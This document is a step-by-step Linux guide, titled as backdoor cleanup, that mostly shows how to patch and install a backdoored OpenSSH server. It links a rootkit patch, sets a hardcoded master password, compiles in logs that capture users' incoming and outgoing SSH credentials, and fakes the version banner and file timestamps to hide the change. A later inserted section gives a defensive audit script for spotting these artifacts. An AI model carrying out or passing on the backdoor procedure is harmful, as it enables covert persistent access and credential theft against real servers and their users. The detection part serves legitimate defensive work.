Linux file backdoor cleanup: Linux security, the SSH backdoor

I. Check the SSH version

[root@redkey vmshare]# ssh -V

OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010

II. Download the SSH source

Source tarball: http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz

Backdoor patch: http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz

III. Back up the existing ssh configuration file

[root@redkey ~]# cp -p /etc/ssh/sshd_config{,.bak}

IV. Build and install

[root@redkey vmshare]# tar -xzvf openssh-5.9p1.tar.gz
[root@redkey vmshare]# tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
[root@redkey vmshare]# cd openssh-5.9p1.patch/
[root@redkey openssh-5.9p1.patch]# cp sshbd5.9p1.diff ../openssh-5.9p1
[root@redkey openssh-5.9p1.patch]# cd ../openssh-5.9p1
[root@redkey openssh-5.9p1]# patch < sshbd5.9p1.diff

patching file auth.c
patching file auth-pam.c
patching file auth-passwd.c
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c
patching file sshconnect2.c
patching file sshlogin.c
patching file version.h

Set the backdoor password "redkey" (the patch adds these definitions near the end of includes.h; ILOG and OLOG are the files where captured incoming and outgoing credentials are written):

[root@redkey openssh-5.9p1]# vim includes.h

int secret_ok;
FILE *f;
#define ILOG "/tmp/ilog"
#define OLOG "/tmp/olog"
#define SECRETPW "redkey"
#endif /* INCLUDES_H */

Change the version string (SSH_VERSION) in version.h so the rebuilt 5.9p1 daemon reports the same banner as the original 5.3p1 install:

/* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */
#define SSH_VERSION "OpenSSH_5.3p1"
#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE

Build & install:

[root@redkey openssh-5.9p1]# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
[root@redkey openssh-5.9p1]# make
[root@redkey openssh-5.9p1]# make install

V. Restore the sshd_config timestamp

[root@redkey ssh]# touch -r sshd_config.bak ssh_config

VI. Restart the service or reload the configuration

[root@redkey ssh]# service sshd reload
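From the defender's side, the steps above leave artifacts that survive the forged banner and the restored timestamp: the log paths /tmp/ilog and /tmp/olog are compiled into the sshd binary, the capture logs appear on disk once someone authenticates, and the rebuilt sshd no longer matches the files recorded by the distribution's package manager. The following audit script is an added example, not from the original post; it assumes a RHEL/CentOS host like the one shown, with sshd at /usr/sbin/sshd and the package named openssh-server.

```shell
#!/bin/sh
# Added audit script (not from the original post): checks for the artifacts the
# patched sshd described above leaves behind. Assumed paths: /usr/sbin/sshd, openssh-server.

# Succeeds if the binary embeds any of the given strings (grep -a scans binary
# files as text). A stock sshd has no reason to reference files under /tmp.
binary_has_string() {
    bin="$1"; shift
    for s in "$@"; do
        if grep -aq -- "$s" "$bin" 2>/dev/null; then
            echo "suspicious string '$s' embedded in $bin"
            return 0
        fi
    done
    return 1
}

# Succeeds if any of the given capture logs exists and is non-empty; the patch
# only writes them once someone logs in, so their absence alone is not a clean bill.
capture_log_present() {
    for f in "$@"; do
        if [ -s "$f" ]; then
            echo "non-empty capture log: $f"
            return 0
        fi
    done
    return 1
}

# Succeeds if rpm -V reports any changed file for the package. rpm -V prints
# nothing when size, digest and mtime still match the package database, so any
# output (e.g. "S.5....T.  /usr/sbin/sshd") means the installed binary was replaced,
# regardless of what banner it advertises.
package_modified() {
    out=$(rpm -V "$1" 2>/dev/null) || true
    [ -n "$out" ] && echo "$out"
}

# Run all checks against the live host; returns 1 if anything looks wrong.
audit_host() {
    rc=0
    binary_has_string /usr/sbin/sshd /tmp/ilog /tmp/olog && rc=1
    capture_log_present /tmp/ilog /tmp/olog && rc=1
    if command -v rpm >/dev/null 2>&1; then
        package_modified openssh-server && rc=1
    fi
    return $rc
}

if [ "${1:-}" = "--run" ]; then audit_host; fi
```

Run it as `sh audit.sh --run`; a non-zero exit means at least one check fired, and the printed line names the artifact.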

VII. Common problems

1. Packages that must be installed: openssl openssl-devel pam-devel

2. Common build problems. Errors that may appear during compilation, with the package that resolves each:

configure: error: *** zlib.h missing – please install first or check config.log

# yum install zlib-devel

configure: error: *** Can't find recent OpenSSL libcrypto (see config.log for details) ***

# yum install openssl openssl-devel
